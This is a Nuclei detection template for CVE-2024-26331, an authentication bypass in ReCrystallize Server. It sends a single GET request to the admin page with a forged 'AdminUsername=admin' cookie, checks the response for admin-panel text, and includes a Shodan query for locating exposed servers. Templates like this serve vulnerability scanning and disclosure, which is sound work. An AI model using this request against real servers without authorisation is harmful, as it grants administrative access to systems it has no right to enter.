nuclei-templates/http/cves/2024/CVE-2024-26331.yaml

37 lines
1.3 KiB
YAML

id: CVE-2024-26331
info:
name: ReCrystallize Server - Authentication Bypass
author: Carson Chan
severity: high
description: |
This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
reference:
- https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
metadata:
verified: true
max-request: 1
shodan-query: title:"ReCrystallize"
tags: cve,cve02024,recrystallize,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/Admin/Admin.aspx"
headers:
Cookie: "AdminUsername=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ReCrystallize Server Administration"
- "License Status:"
- "System Info</a>"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502210080910a3943e4988be013115a405cba6b2a3ebe196ba7484f7880a73f52e5134f02201aecddd5947b597c5263b214739ac08884025c217e2c5460e5e8f56cd60e5c39:922c64590222798bb761d5b6d8e72950